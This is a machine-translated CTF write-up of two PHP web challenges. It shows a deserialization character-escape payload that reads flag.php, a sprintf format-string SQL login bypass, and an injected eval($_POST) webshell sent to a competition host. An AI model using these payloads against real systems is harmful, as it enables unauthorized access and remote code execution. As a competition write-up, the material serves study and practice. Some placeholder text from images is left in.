ANHENG April Spring War-web

Ezunserialize

Open to get the source code:

 <?php
show_source("index.php");
function write($data) {
    
    
    return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data);
}

function read($data) {
    
    
    return str_replace('\0\0\0', chr(0) . '*' . chr(0), $data);
}

class A{
    
    
    public $username;
    public $password;
    function __construct($a, $b){
    
    
        $this->username = $a;
        $this->password = $b;
    }
}

class B{
    
    
    public $b = 'gqy';
    function __destruct(){
    
    
        $c = 'a'.$this->b;
        echo $c;
    }
}

class C{
    
    
    public $c;
    function __toString(){
    
    
        //flag.php
        echo file_get_contents($this->c);
        return 'nice';
    }
}

$a = new A($_GET['a'],$_GET['b']);
//省略了存储序列化数据的过程,下面是取出来并反序列化的操作
$b = unserialize(read(write(serialize($a))));

You can see that there is a replacement! ! ! Yes, it is the escape of deserialized characters again~~~
\0\0\0 is originally 6 characters, but chr(0) . '*' . chr(0)after being replaced, there are only three,
and its write is called first, and then it is called after read,
as follows:

我们username传入27个\0，password传入1234";s:3:"age";payload
由于chr(0)不可见，用文字代替了
O:1:"A":2:{s:8:"username";s:54:"27个字符";s:8:"password";s:22:"1234";s:3:"age";payload;}

This deserialized payload is well constructed:

<?php
class A{
    
    
    public $username;
    public $password;
    function __construct($a, $b){
    
    
        $this->username = $a;
        $this->password = $b;
    }
}

class B{
    
    
    public $b;
	function __construct(){
    
    
        $this->b = new C();
    }
}

class C{
    
    
    public $c;
	function __construct(){
    
    
        $this->c = "flag.php";
    }
} 
$a = new A("123",new B());
echo serialize($a);
?>

O:1:"A":2:{
    
    s:8:"username";s:3:"123";s:8:"password";O:1:"B":1:{
    
    s:1:"b";O:1:"C":1:{
    
    s:1:"c";s:8:"flag.php";}}}

Then add this payload to it~
the payload of this question:

a = \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
b = 124";s:3:"age";O:1:"A":2:{s:8:"username";s:3:"123";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}}}
http://183.129.189.60:10001/index.php?a=\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0&b=124%22;s:3:%22age%22;O:1:%22A%22:2:{s:8:%22username%22;s:3:%22123%22;s:8:%22password%22;O:1:%22B%22:1:{s:1:%22b%22;O:1:%22C%22:1:{s:1:%22c%22;s:8:%22flag.php%22;}}}

Get the flag:
Insert picture description here

babytricks

This question has not been made, here is the test site,,,,
1. Format string
Open the source code and you can see the sql statement:

select * from user where username='$user' and password='%s'

Because the title filters single quotation marks, backslashes, and underscores, etc., conventional injection will not work,,,,
format string, use placeholders: %1$swallow the quotation marks, the code is as follows:

<?php
$user = "%1$";
$pass = " or 1=1#";
$sql = "select * from user where username='$user' and password='%s'";
echo sprintf( $sql, $pass) ;

运行结果：
select * from user where username='nd password=' or 1=1#'

Since or is also filtered here, we can use ^0it as follows. When we query a non-existent column name, the query can also be successful: the
Insert picture description here
structure username=%1$&password=^0#can get the back-end account password

Two:
We can get the source code after login in single line mode getshell background:

<?php
error_reporting(0);
session_save_path('session');
session_start();
require_once './init.php';
if($_SESSION['login']!=1){
    
    
    die("<script>window.location.href='./index.php'</script>");
}
if($_GET['shell']){
    
    
    $shell= addslashes($_GET['shell']);
    $file = file_get_contents('./shell.php');
    $file = preg_replace("/\\\$shell = '.*';/s", "\$shell = '{
      
      $shell}';", $file);
    file_put_contents('./shell.php', $file);
}else{
    
    
    echo "set your shell"."<br>";
    chdir("/");
    highlight_file(dirname(__FILE__)."/admin.php");
}
?>

This smiling master and the great god of the cow have written articles~~ Worship Orz
classic writing configuration vulnerabilities and several deformation
small dense circle classic writing configuration vulnerabilities and several deformation learning The
principle and payload have been explained very clearly in the article! ! ! Worship Orz
payload again :

http://183.129.189.60:10006/admin/admin.php?shell=;eval($_POST[y1ng]);
http://183.129.189.60:10006/admin/admin.php?shell=$0

You can getshell~~~ Don't be too showy! ! !

3. Bypass disable_functions The
official WP comes out and fill it out again, saying that there is a live broadcast, looking forward to ing! Temporarily~~